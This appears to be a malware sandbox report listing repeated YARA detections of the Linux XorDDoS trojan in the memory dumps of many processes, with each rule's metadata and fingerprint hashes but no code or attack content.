Source: 6382.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6382.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6540.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6540.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6540.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6540.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6540.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6540.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6451.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6451.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6451.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6451.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6451.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6451.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6475.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6475.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6475.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6475.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6475.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6475.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6305.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6305.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6305.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6305.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6305.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6305.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6558.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6558.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6558.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6558.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6558.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6558.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6364.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6364.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6364.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6364.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6364.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6364.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6500.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6500.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6500.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6500.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6500.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6500.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6327.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6327.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6327.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6327.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6327.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6327.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6503.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6503.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6503.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6503.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6503.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6503.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6555.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6555.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6555.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6555.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6555.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6555.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6387.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6387.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6387.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6387.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6387.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6387.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6288.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
